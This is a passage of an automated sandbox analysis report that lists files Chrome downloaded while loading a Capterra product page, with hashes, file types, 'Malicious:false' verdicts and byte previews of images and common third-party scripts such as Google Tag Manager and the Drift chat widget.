                                                                                                                                                                                                        SHA-512:232C7C001B0FCEF710CC4CEE0C7D20C146ADA811A312E666AC880F127173F1BE3BF062C5B71587CB1F17FA8BCB145376115287AADD26247DCFDC68B21426C900
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...o.....'.......sRGB.........IDATx^..p.U..?.so..4TjE.a.......bw.Ci.h....@....E.q]...e}lw]f.....67..R.<..6.0b[..,..D...H.Mz..s.?.M.........g.Irs{.?..?..y..B..K..Bw.4T.!.6D..L....D_..3.....9....e.PF..(....L.N@D.A.....K.[@..VV.o.LH...h.$&.?..I........;.^...`m..#...T.*Y..n.Lb..L....%.\..4/....HO.(.#,c.....'.$R`m.....>\Ta....:...l.F.F...K.O.........v`.w.z.d.K.H..z........\.-...c.Y.......:w...!.fj.J.....u..Q..7..9Q...U..k.z*)Y.1..uq..Y.:.U^$w.z..1....M$%+....E..../...G..-0....yA...&.ZD......Dkc.....E...%..^.$H.....!....&@`P}...lY....F.&Z.7cL..:.5.s......F../..I=.j%.B...-.m....`1.!$L\.&.D.k...F.^..=.S....m......."....y..9.O".Ta%C@.#.^1... ......?..E.!..a....NO.......I .#..s.q.8.......B8...MY n..,.!......q.I:.ZcN'......c.N.\P}.....0..7n..q..`..G.a..@...7n.(.s.!..."..|..#)4.k).q[R.@ ....f.......a.,.{..(.......C.=.D.1h.Q.......6..W.v...rAyA::..HA..^.....rX#...B..{.n..xz8....B8...Mk..y...].y.@.G..<..d.'Z.}3..O.....OJtu....\..K......>.>.X.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4591
                                                                                                                                                                                                        Entropy (8bit):7.2313960592451085
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jEc5N26MT0D5MdtbZPAVwzVHlBJdDKaWNaqzW:+0gcoYNMtKw/BnkV6
                                                                                                                                                                                                        MD5:306971343F5075D22B4D238D2F9EE231
                                                                                                                                                                                                        SHA1:1F7F5911CBEE82129160F4926D0F2630E8360081
                                                                                                                                                                                                        SHA-256:4EF16CB8C9156651EB2B5087CB34F185323E6EE542EAE441426881E175712E87
                                                                                                                                                                                                        SHA-512:74BCF7EED60E35BF62F172D08E37F90273E374187173D557A9BFF38B830FE97CDF9787DDD85D906521535A484494257A107770E6EB87E01CAFB181CCEC5E487B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/1169750b-93b3-4296-9407-d5f4cc984d40.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 128x77, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2704
                                                                                                                                                                                                        Entropy (8bit):7.807446775061292
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:HcVjSKOEEs9xOhIcMYMlxDQRBycLyElRdqYY8R:8VGKOEB9xODMRHIyEDzfR
                                                                                                                                                                                                        MD5:911ACC09AAC3DEF98A2819A746997B4B
                                                                                                                                                                                                        SHA1:9697DB7398492A1091A5B64FE040DA4B6D26A263
                                                                                                                                                                                                        SHA-256:2D0A0A84D9F072EE3F2C2065BBDF8C46459E40530CB7E4E3B0A5FC504A975923
                                                                                                                                                                                                        SHA-512:60E59A85356936BA9D578F60C23E08A378D1B8918BB2816D395D5351E3BC08736ABF17EC44DBD3D93A349A177266AF51C85F22AFE2E88C9A6CCCA507B431BF40
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\......M...."..........5............................................................................uG}.;..r...y...\9..E-|).........B....r.'....'j.#..}^k.bi....,`.../.^.3....Ec=e.y}..."m[Z!.S..RX...pp..t.....j..tb[Z\..].6./.P.f.._Q..8.r.#......vV5....;.+...8.L8..,.H..8.mbX....M...........................!1..AQS....."37Uat...r. #$%25Bbq...&046RVcs.............?...~v.0...V.0......SS"D.5.]Q.`....v..<.....iA...b..M.b..A.......S.........{.... h^.$.m......[x....OIv....I..gi.....D..t.3e.]&.....e .I......Tp..PO.a./.).K...!GF*.v.F..".wB!.-...i.8..l.YC.H.I..y.1.......&.......0,.r.)*....0......C.0.....s..L/.zt-....LJ.-<I.....0ea$.2..=..7.....c..Q.!.]..O..(.J<]3.v...9v.....)..Y.=f->,X>o*Y`N...p,}...,.^F,m{^Y.{...l/..T..%&&..YPK9@....~....LE..C.Q`......4SLg.6v.Z.&1gf.I$.&%.v..?$U.e.]..[..U]...]$....c.\+.....54.d..D
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 200 x 42, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5606
                                                                                                                                                                                                        Entropy (8bit):7.956795005736008
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:2EKPEIQck1KXr4jEEzuPM12zkeN+F7/VZDR65mOmW7IjbWUCOGHG1cYVxRUy:2E78rOELlAFbXUYsIjbPV+2Sy
                                                                                                                                                                                                        MD5:48271C88F3918900A92BEF0C3074F502
                                                                                                                                                                                                        SHA1:8514372D0F82E4FB88DA10F679F10D37C89A20DA
                                                                                                                                                                                                        SHA-256:0236A42791F0424882AA9A4CDBCADB216ABA9D660B5E1C1DD4AFFD987C7B0359
                                                                                                                                                                                                        SHA-512:74D4C9D0C943C6D3BEA3DF722DB4C7D4A35EC3168274107D37203B9BCEE4AEEDFA4D62CE19DA6DF7514DD71ADB6CB8BFBB37A51591248A9677D4969EDC774F98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/features_review_icon.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......*.............gAMA......a....8eXIfMM.*.......i......................................*.........YIDATx....\.y......N....H. ....E..D,CpB...$......d....2a.......@`....i..BH ...].:]......n....w.+....m}......[.0.)...O.8zG.7..j...+.A.']..;~j.O.._..Ia\.$E).".}m.4.g...q.....4.khHJ....8...IY...u...b......]..6....8""eqb.D9".:....7<`..8....$.....}R..*.p8?....o4!..q".3.'..6...."c..dhtX..:etd.JS.....D..4...>-...}...8._.-.KjT....W..Jj.[...+..%'......^.b...e....E"c/...y.....N.[q.9.'.r.......'fH...5).......g..M........iE..-.6.>T"....I.=.(.h..S+R......4...W[.'...(....m. ..f8.....c..a..Q.......@.....+..A./..p.@..$..NRD4k.%.t.L..D..Qv.c.EO...i.`S...JC;...b. h....+.g....;X..c.[2...D....r.]cdDV..kS..P....H...[2.....`\T....... 0.0>S...I..9..`....o..*.......<s...\..1l..lEr.|w..I....zX.IC1.~.&....4#.$...Q k3..u..@.1...2w].....08..<)....D..f,t..r6.!TS..++.s.....6e....../.....")..}w.\m.ek.U...':.XI...9K$...%{.........r....LY..%+l...b...9.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17276), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17276
                                                                                                                                                                                                        Entropy (8bit):5.275563685354605
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:WKEO0mA6Hs8Bbp6f+Uf+XKyPjCJkvQf+WaRXbsi7v:WKGmA6Hsm5b9FD
                                                                                                                                                                                                        MD5:8409DABBC7D3609DD0E668419C54102D
                                                                                                                                                                                                        SHA1:DFB8DDA9B07D68E90065E079C4BE90A3090A82BC
                                                                                                                                                                                                        SHA-256:C9B8554C63C8CB6D2F9FCBFCF1755C5DFA678C13199F7FA44BD3B7A57F34C1F0
                                                                                                                                                                                                        SHA-512:9309F06E3967EB7ACFB2586B3857D352930BD1514F343B8410692663DE218254EA9A2AB8DB5C96BAD7D943CD5573A55A3B21A29FDF4483389C2489B48DC0FCA5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://seoab.io/
                                                                                                                                                                                                        Preview:(()=>{"use strict";var e,n,t={231:(e,n,t)=>{t.d(n,{A:()=>r,j:()=>o});var r="0",o="SPLITSIGNAL_APPLY"},4424:(e,n,t)=>{t.d(n,{CX:()=>u,D1:()=>i,VZ:()=>r,ew:()=>o});var r=function(e){return"errors"===e._tag},o=function(e){return"complete"===e._tag},i=function(e){return{_tag:"errors",errors:e}},u=function(e){return{_tag:"complete",undo:e}}},9938:(e,n,t)=>{var r,o;t.d(n,{Kc:()=>c,Qy:()=>r,Rv:()=>l,cQ:()=>s,gf:()=>i,nl:()=>a,ug:()=>o,y8:()=>u}),function(e){e.upperCase="UPPER",e.lowerCase="LOWER",e.titleCase="TITLE",e.capitalize="CAPITALIZE"}(r||(r={})),function(e){e.After="AFTER",e.Before="BEFORE",e.FirstChild="FIRST_CHILD",e.LastChild="LAST_CHILD"}(o||(o={}));var i=function(e,n){return"ADD_ELEMENT"===e},u=function(e,n){return"MOVE_ELEMENT"===e},a=function(e,n){return"DELETE_ELEMENT"===e},c=function(e,n){return"REPLACE_CONTENT"===e},l=function(e,n){return"UPDATE_ELEMENT_ATTR"===e},s=function(e,n){return"UPDATE_ELEMENT_TYPE"===e}},7199:(e,n,t)=>{t.d(n,{BJ:()=>r,QT:()=>s,XG:()=>d,Y3:()=>v,aH:(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):187623
                                                                                                                                                                                                        Entropy (8bit):5.526509037681672
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:b0YbrjYdB6s9EFYwV0mYrJ5Cz+joJW3Ko4lEZtNAJ06hg:ASAdB6siFeElEZtNAJ06G
                                                                                                                                                                                                        MD5:9984497C0BAF48235C566FAFEFB8B2FB
                                                                                                                                                                                                        SHA1:9D76839C99AFE427A24A14316F6F8AF70E82B171
                                                                                                                                                                                                        SHA-256:401C2BA7F694E859A0D2A1B173E5976C2C739B38EAF1B1B5F26030A79D5E855A
                                                                                                                                                                                                        SHA-512:F14D6F8A5479A27A085583D3BBC13D1562454E1FB964F3FE5FFB9F7D40216F46A7E60B4C913B0E9E05B834CD1A8AE79F59AA4CA6964EF0E9374D3DCA6FF5AB1C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.google-analytics.com/gtm/js?id=GTM-T3XSLV5&cid=1968510630.1725034605
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2358",. . "macros":[{"function":"__e"},{"function":"__dee"},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-MLNC5","function":"__c","vtp_value":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"vtp_component":0,"function":"__c","vtp_value":"Chrome"},{"function":"__c","vtp_value":false},{"function":"__gaoo_c","vtp_trackingId":"UA-126190-1"},{"function":"__ctto","vtp_isDynamic":false},{"function":"__sel","vtp_selector":":root"},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-T7B2D","function":"__c","vtp_value":false},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-58HW4","function":"__c","vtp_value":false},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-TBPTW","function":"__c","vtp_value":false},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-MWLJH","function":"__c","vtp_value":false}],. "tags":[{"function":"__asprv","vtp_globalName":"google_optimize","vtp
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):92674
                                                                                                                                                                                                        Entropy (8bit):5.288414419714851
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:aituX55DPfb/wFG26UtHnbTcCAC0dn4Bs9qatj9N+jpT:Z+hwFGme4nT
                                                                                                                                                                                                        MD5:16D7AE86E21434A32157D3226AC9BB77
                                                                                                                                                                                                        SHA1:6EAA4577EFA2568AA7752B00AA42523BDA14CA95
                                                                                                                                                                                                        SHA-256:6C9C6406C9BD9814CF84974221433003377B67F071EC5411FDDBCBA4EC109BCA
                                                                                                                                                                                                        SHA-512:818A9CBFACFBC15F382F286E9C5B3476C4F508B30F4DAD880309C586C8725C52CA43266E3B04912A9E0423D93DA15997F3EAE563542767EDA63321E1BCEC1DEB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/14.e24a6190.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[14],{"+WaJ":function(e,t,r){"use strict";function isFunction(e){return"function"===typeof e}r.d(t,"a",function(){return isFunction})},"/V3T":function(e,t,r){"use strict";var n=r("13WS"),o=function(e){function Action(t,r){return e.call(this)||this}return n.a(Action,e),Action.prototype.schedule=function(e,t){return void 0===t&&(t=0),this},Action}(r("LR82").a);r.d(t,"a",function(){return i});var i=function(e){function AsyncAction(t,r){var n=e.call(this,t,r)||this;return n.scheduler=t,n.work=r,n.pending=!1,n}return n.a(AsyncAction,e),AsyncAction.prototype.schedule=function(e,t){if(void 0===t&&(t=0),this.closed)return this;this.state=e;var r=this.id,n=this.scheduler;return null!=r&&(this.id=this.recycleAsyncId(n,r,t)),this.pending=!0,this.delay=t,this.id=this.id||this.requestAsyncId(n,this.id,t),this},AsyncAction.prototype.requestAsyncId=function(e,t,r){return void 0===r&&(r=0),setInterval(e.flush.bind(e,this),r)},AsyncAction.prototype.re
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4179)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):222149
                                                                                                                                                                                                        Entropy (8bit):5.543040901978482
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:kSAdB6siv20G6M5DzelEZtNAJ0ZLtpOGK:bAv6sc2FeWdaGK
                                                                                                                                                                                                        MD5:776FA9F72A42251F32E5C70F251B21FA
                                                                                                                                                                                                        SHA1:C6880D9336BA07ED66E5AC733DF05F5ECF8E14FA
                                                                                                                                                                                                        SHA-256:0576259B9164A74C112DB6E189401D5AC103BD706F279B668DCC0EC82EB81359
                                                                                                                                                                                                        SHA-512:191951ECBE74EF20A1AD2CD456C7831ED0922DC4C1C84D83033D4277A1927F9BF06AEA23E1A00435FA3744FCDE38F66199863AE8B57DA5FF57C2AAB120AAA198
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-8036043","vtp_remoteConfig":["map"],"tag_id":5},{"function":"__ogt_dma","priority":0,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":8},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_s
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3391
                                                                                                                                                                                                        Entropy (8bit):4.526418045434012
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:CMbwSiHc5Ym3uJBGYgtBvemWHNsIfU1/UxOGb1ONVPu:DbwSN6JBngtRe7H68U1/OOGpOHPu
                                                                                                                                                                                                        MD5:9F227C0B51933181E4C482E2BD9ED76B
                                                                                                                                                                                                        SHA1:887F1ABB9CDB399315D169AB6BF2859D5166293D
                                                                                                                                                                                                        SHA-256:E0A1D6E38C08B37A2218C4D2E049498940A2A1E50F357F3DF14F7DA46685BEFA
                                                                                                                                                                                                        SHA-512:AA1DF41EC28ADE366E2F02614D19CAF4F26C35EB2EDD25B5D06AE63ED9881CC098F346098B8CAF52385846CB50C2E8930D3067D09E421796F824808FB4F821DF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="298px" height="120px" viewBox="0 0 298 120" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 61 (89581) - https://sketch.com -->. <title>EBay_logo</title>. <desc>Created with Sketch.</desc>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="EBay_logo" fill="#444444" fill-rule="nonzero">. <path d="M38.5452377,26.0909534 C17.5742668,26.0909534 0.0991705488,34.9878922 0.0991705488,61.8295507 C0.0991705488,83.0940536 11.8499078,96.48516 39.0867312,96.48516 C71.1457478,96.48516 73.2008469,75.3668975 73.2008469,75.3668975 L57.6667408,75.3668975 C57.6667408,75.3668975 54.3360982,86.7382701 38.139117,86.7382701 C24.9471183,86.7382701 15.4589157,77.8266883 15.4589157,65.3358099 L74.8253286,65.3358099 L74.8253286,57.4975993 C74.8253286,45.1401937 66.9806311,26.0909534 38.5452377,26.0909534 L38.5452377,26.0909534
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 32x32, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):774
                                                                                                                                                                                                        Entropy (8bit):6.7641934701596265
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tLpLjEFLjEm93MUA/9Ory8asuBG4CJp2aMMZ6nJOOWwhpNAz2VR:TYz3MUAFiVJE8ZM8mG2VR
                                                                                                                                                                                                        MD5:2AACAF17207EB610146B9C204D80416B
                                                                                                                                                                                                        SHA1:7322DE11E72B4AAC8811EE50FBC07035ED6CEFAC
                                                                                                                                                                                                        SHA-256:DF2E2EDADD4710C438A98B07886B33CE4A6F26153616BEAEADB00C21F1EBBD15
                                                                                                                                                                                                        SHA-512:A6E14D34AC180AEFEE518C3E26AAC9BC9496E9A1673339AC61FEC1A7FCD836BB3F9E70BB42A4CAE44AE1BCB7DDAB33840DC97A77883F8EB30024A0C35D19026F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\...... . .."......................................................................M..da.(..k.2e.W+.....&...........................!.1 ..2Aa........?..e..{....P.E....R....%...........9D4..6v".....VC.[i..........v.O...! .H....z......o....".$..u,.P........x.g..E...-..*.t.x..4..YuQ...)..w.+".[if.ZYQbEm....,...#.Q.............DtQ...F.. ...;...=..,4..CN.O,.G.4...w...4......!.........................!.A12.........?.....$.;9].mX...?....;...W.].;;.nE...4..A..CZ..]....1q..-.o.S....... .......................!...1Aq........?...e.g.[..... ....).%..T.+....Q}...4?yY.,UrH.Q.;.b.>..#z:...v*Z..8.L.p.FA...w....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1551), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1551
                                                                                                                                                                                                        Entropy (8bit):5.161128430694816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:0E01AZ14iwMsom6ZrEzZv9QxlM/sJ5u/sRxQ75jml61X5E1d1I:0EG+1prEzZvKxzTvQ7Rm0
                                                                                                                                                                                                        MD5:4127EECB7391C86AA101479BB190EBF8
                                                                                                                                                                                                        SHA1:AFE7D7A2AC54317CC66DFF15BBF8AEEC661415BB
                                                                                                                                                                                                        SHA-256:2A2789BF9ABA4C8AE6F230BAEFD3630D16DCFC9A89C172E4BD964AFCDDEABEB0
                                                                                                                                                                                                        SHA-512:3161FF966EEFE2E6EBBD4E74273B6C5A1446DF0F1B343F7270B67B0DE7063371811CA24FFAAA9EE937CC601FCFFBE5FE702F8D76E765501091887E66D40A0C2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F
                                                                                                                                                                                                        Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="manifest" href="/core/manifest.json"><link rel="dns-prefetch" href="https://js.driftt.com" crossorigin><link rel="dns-prefetch" href="https://customer.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://conversation.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://targeting.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://metrics.api.drift.com" crossorigin><title>Drift Widget</title><script type="text/javascript">__ENV__="PRODUCTION",__BUILD_ID__="20240822210811-ae8a2e9",__REGION__=window.location.search.match("[\\?&]region=([^&#]*)")?window.location.search.match("[\\?&]region=([^&#]*)")[1]:"US"</script><link rel="preload" href="/core/assets/js/runtime~main.72ecb88a.js" as="script" crossorigin="anonymous"><link rel="preload" href="/core/assets/j
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2744)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):232123
                                                                                                                                                                                                        Entropy (8bit):5.5523440864825355
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:ay05RLxI5i2A415QyqVho8HMTm8/kCtAXNe1x:aRvA5Qyqccyh/kCtAXIx
                                                                                                                                                                                                        MD5:BE163398DD7400A74CAD7C9990EE0826
                                                                                                                                                                                                        SHA1:DD0D593F16E0BB2C3F55029BAFBBCB8410DC5BB9
                                                                                                                                                                                                        SHA-256:00C447ED55A62B4E2ACC831ECB9FC6EF8E4BF07F5E5E5D0DA8F6127A90DB7E59
                                                                                                                                                                                                        SHA-512:0BE65840EF4A43FDF123185EC0E8F2F37471D30424B73A975E67124C3E79CBD546D7B9C1BBD70758CDDE913152FD515AEF7FA0FF1C518696A36EECA05946DBD8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://accounts.google.com/gsi/client
                                                                                                                                                                                                        Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x1220000, 0x701, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writabl
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12869), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12869
                                                                                                                                                                                                        Entropy (8bit):5.387027259622779
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:4IBuCFR08LT0xD3GPBps+a/fCFB3e9zELSnsLTCn1Hej:4MuD3GKQBGISR1HE
                                                                                                                                                                                                        MD5:F507C73097318EC0979B0E8E2400C148
                                                                                                                                                                                                        SHA1:86FAC2188E6EC79D54C44614BB10878FE8E135F6
                                                                                                                                                                                                        SHA-256:2B3BF75D275512A36620DB1375D97B93711914DE8F916FB478F8D331A07B4974
                                                                                                                                                                                                        SHA-512:1D92B2DFD7FA5C7D809D49E1D8E7B1DC55EA8ADF585D894D5454578712A497C968B83CBAE0B9F98F7A07A5D4CD8587B537BF542E70D41E055266E3DB8AC6DD37
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/5297-a035d2461ccf964f.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5297],{64993:function(e,t,n){n.d(t,{e:function(){return _},default:function(){return j}});var l=n(27573),i=n(14823),a=n(62780),r=n(34617),o=n(4854),s=n(22222),d=n(81731),c=n(48543),u=n(10741),m=n(78713),v=n(80978),g=e=>{let{product:t}=e,{deviceType:n}=(0,v.h)(),i="These products are similar to ".concat(t.name," in terms of categories, features, and verified user reviews. We have prioritized alternative products from vendors who pay for traffic from our site - orange buttons will take you to these vendor sites.");return(0,l.jsxs)("div",{className:"whitespace-no-wrap md:mb-3xl mb-xl text-center","data-testid":"h2h-heading-disclaimer-container",children:[(0,l.jsxs)("h2",{className:"pr-2xs text-neutral-99 inline whitespace-normal text-lg font-semibold md:text-xl","data-testid":"h2h-heading-disclaimer-title",children:["Other great alternatives to ",null==t?void 0:t.name]}),(0,l.jsx)("div",{"data-testid":"h2h-heading-discl
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):47992
                                                                                                                                                                                                        Entropy (8bit):5.605846858683577
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                        Malicious:false
